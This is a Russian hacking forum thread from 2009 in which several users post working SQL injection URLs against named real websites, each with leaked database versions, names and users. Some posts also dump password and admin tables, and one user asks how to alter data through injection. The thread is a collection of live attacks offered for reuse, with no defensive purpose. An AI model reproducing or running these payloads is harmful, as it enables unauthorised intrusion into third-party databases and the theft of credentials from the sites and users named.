ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10141  
Старый 12.07.2009, 02:02
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию

blind PR4

http://www.pollanetsquad.it/attore.asp?cod_att=2150+and+ascii(substring((conca t_ws(char(58),user(),database(),version())),1,1))> 1

Sql135947@%:Sql135947_1:5.0.68-log
 
Ответить с цитированием

  #10142  
Старый 12.07.2009, 02:17
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885

Репутация: 34
По умолчанию

http://www.baltimorebrass.net/index.php?cat=5+UNION+SELECT+1,2,3,4,CONCAT(Versio n(),Database(),User()),6,7--

67-communitybaltim4_websitebaltim4_wsclient@localhost
 
Ответить с цитированием

  #10143  
Старый 12.07.2009, 10:19
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070

Репутация: 173
По умолчанию

Код:
http://www.n-rabota.ru/resume/post.php?id=1+union+select+1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--
Database Version: 5.0.81
Database name: n-rabota
User name: n-rabota@localhost
 
Ответить с цитированием

  #10144  
Старый 12.07.2009, 11:32
rolex
Познающий
Регистрация: 07.04.2009
Сообщений: 40
Провел на форуме:
8945659

Репутация: 103
Отправить сообщение для rolex с помощью ICQ
По умолчанию

Цитата:
http://www.winnersport.ru/main.php?s=catalog&id=-627+union+select+1,2,concat_ws(0x3a,database(),ver sion(),user()),4,5,6,7,8--
Цитата:
http://www.oil.se/article.php?sub=0&section=6&id=-35+union+select+1,2,3,4,5,concat_ws(0x3a,database( ),version(),user()),7,8,9--
Цитата:
http://znamiarodiny.artmiem.ru/main.php?id=15+union+select+1,2,concat_ws(0x3a,dat abase(),version(),user()),4,5,6--
Цитата:
http://www.librasdeamor.org/help.php?IdPage=-15+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,datab ase(),version(),user()),9,10,11--
Цитата:
http://www.thakornkit.com/new.php?id=-1+union+select+1,2,concat_ws(0x3a,database(),versi on(),user())--
вывод в тег img

Последний раз редактировалось jokester; 12.07.2009 в 12:26.. Причина: blackwood.ru БОЯН
 
Ответить с цитированием

  #10145  
Старый 12.07.2009, 16:01
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

Код:
http://www.bulletinpa.com/index.php?id=-907+union+select+1,2,3,4,5,6,7,8,9/*
blind

---------------------------------------------------------------------------------------------------------

Код:
http://travel.emeraldcoast.com/article.php?id=-175+union+select+1,version(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21/*
Database Version: 5.0.26-standard-log
Database name: iansawesomedb
User name: isH4X0r@cyclone.emeraldcoast.com

---------------------------------------------------------------------------------------------------------

Код:
http://www.stormbringer.at/news.php?id=-3706'+union+select+1,2,3,4,5,admin_id,7,8,9,0,11,12,13+from+admin/*
Database Version: 5.0.45
Database name: usr_web5_1
User name: web5@localhost

Последний раз редактировалось Skofield; 12.07.2009 в 17:35..
 
Ответить с цитированием

  #10146  
Старый 12.07.2009, 21:23
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.ibnlokmat.tv/gallery.php?id=1&conid=-57082+union+select+1,2,concat_ws(0x3a,version(),us er(),database()),4,5,6,7--

5.0.27-standard-log:lokmat@172.29.11.1:ibnlokmat

####################################
http://wcha.tv/live.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9--

5.0.22-Debian_0ubuntu6.06.10-log:site_wcha_tv:wcha@64.73.77.67

####################################
http://www.tv-portal.ru/index.php?kanal=-339+union+select+1,2,concat_Ws(0x3a,database(),use r(),version()),4,5,6,7,8,9,10,11&stat-id=1

db_kokos32_2:dbu_kokos32_1@192.168.7.9:4.1.22

####################################
http://laurabenjamin.tv/video.php?id=1&section=1+union+select+1,concat_ws( 0x3a,user(),database(),version()),3,4,5--

LBTV@208.109.181.196:LBTV:4.1.22-max-log

####################################
PR: 5

http://www.fabawards.tv/view-fabawards-2009show.php?id=1'+union+select+1,concat_ws(0x3a,u ser(),database(),version()),3+from+mysql.user+--+

All_DB_Admin@localhost:fabawards:5.0.83-rs

вывод в пути картинки..есть mysql.user...путь так и не нашел (((

####################################

http://www.na.owns.tv/index.php?page=userprofile&id=-1'+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28+/*+

naownstv@localhost:naownstv-web:4.1.20

####################################
http://www.tv-live.ro/radio-live.php?id=-1+UnIoN+SeLeCT+concat_ws(0x3a,user(),database(),ve rsion()),2,3,4,5,6--

tvlive@localhost:tvlive_db:5.0.67-community.jpg

####################################
http://ua.tv-mis.com/titul.php?id=1+and+substring(version(),1,1)=5--
####################################
PR 3
http://www.supplyanddemand.tv/show_news.php?id=-1+union+select+1,2,concat_Ws(0x3a,database(),user( ),version()),4--

supplyd:supplyd@localhost:4.0.25

####################################
http://www.vehiclegraphics.tv/view.php?id=1'+and+substring(version(),1,1)=5+/*+
####################################
http://www.lancs.tv/index.php?PHPSESSID=urewmdaiezvwdmn&p=page&id=-1+union+select+1,2,concat_Ws(0x3a,user(),database( ),version())--

lccc-root@localhost:lancstv:5.0.51b-log

####################################
http://www.famicomdojo.tv/subscription.php?id=1+union+select+1,2,3,4,5,6,7,8 ,concat_Ws(0x3a,user(),database(),version()),10,11 ,12,13,14,15,16,17--

tfboogaloo@logic:FamicomDojo:5.0.37-standard

Последний раз редактировалось HAXTA4OK; 12.07.2009 в 22:42..
 
Ответить с цитированием

  #10147  
Старый 12.07.2009, 22:43
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.catan.ro/index.php?pagina=stire&id=-43+UNION+SELECT+1,2,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),4

Database Version: 4.1.22-standard-log
Database name: catanro_catan
User name: catanro_catan@localhost
Os : pc-linux-gnu
 
Ответить с цитированием

  #10148  
Старый 12.07.2009, 23:13
Staratel
Познающий
Регистрация: 03.02.2009
Сообщений: 32
Провел на форуме:
326183

Репутация: 18
По умолчанию

1)ребята подскажите какую нибудь прогу сканнер sql, чтобы ссама бегала по сайту подставляя ковычки в переменные в поисках мускл ошибок.

2) И ещё оч прошу покажите на примере урла как правильно заюзать в update
Изменить значений переменных в базу с sql inj запроса.

Спасиб большое.
 
Ответить с цитированием

  #10149  
Старый 13.07.2009, 00:02
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

mssql
[PR 5]
Код:
http://www.coveredbridges.com/events/annualEvents.asp?id=1+or+1=@@version--
Цитата:
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
====================================
[PR 4]
Код:
http://www.anconia.com/support/faq.asp?id=1218+or+1=@@version--
Цитата:
Microsoft SQL Server 2005 - 9.00.4207.00 (Intel X86) Dec 17 2008 14:34:38 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
====================================
====================================
[PR 6]
Код:
http://www.juristenverband.at/kalender.php?id=-137+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12
4.0.21:juristenverband:root@localhost
Код:
http://www.juristenverband.at/kalender.php?id=-137+union+select+1,2,3,4,5,concat_ws(0x3a,user,password,file_priv),7,8,9,10,11,12+from+mysql.user
====================================
[PR 3]
Код:
http://www.werkensepolder.nl/kalender.php?id=-24+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7
4.0.15:werkense:werkense@localhost
====================================
[PR 2]
Код:
http://www.beitstadfjordmc.no/applic/kalender.php?id=-21+union+select+concat_ws(0x3a,version(),database(),user())
5.0.32-Debian_7etch10-log:beitstadfjordmc:beitstadfjordmc@srv85.one.com
====================================
[PR 2]
Код:
http://www.svenarum.nu/kalender.php?id=-1011+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9
5.0.27:svenarum_nu:svenarum.nu@localhost
====================================
[PR 1]
Код:
http://www.judyreynolds.com/en/kalender.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13
5.0.32-Debian_7etch10-log:db1073307-judy:dbu1073307@localhost
Код:
http://www.judyreynolds.com/en/kalender.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,id,name,pass,admin),6,7,8,9,10,11,12,13+from+user
====================================
[PR 1]
Код:
http://www.vvvolkegem.be/kalender.php?ID=-11+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10--
4.1.22-standard:voevol06_volkegem:voevol06_43sj29a@localhost
====================================
[PR 0]
Код:
http://www.donkerewolk.net/kalender.php?id=-22+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5
5.0.37-standard:tarsforier_wolk:tarsforier_tf@localhost
Код:
http://www.donkerewolk.net/kalender.php?id=-22+union+select+1,2,concat_ws(0x3a,user_id,username,userpass),4,5+from+poll_user
====================================
[PR 0]
Код:
http://www.h-lebt.de/kalender.php?id=9999999999+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16--&month=6
5.0.32-Debian_7etch5-log:usr_web0_1:web0@localhost
Код:
http://www.h-lebt.de/kalender.php?id=9999999999+union+select+1,2,3,4,5,concat_ws(0x3a,username,password),7,8,9,10,11,12,13,14,15,16+from+be_users--&month=6
 
Ответить с цитированием

  #10150  
Старый 13.07.2009, 00:47
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070

Репутация: 173
По умолчанию

Код:
http://provympel.ru/index3.php?id=56+union+select+1,version(),3,4--
Database Version: 5.0.81-community
Database name: magics_complex
User name: magics_tester@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ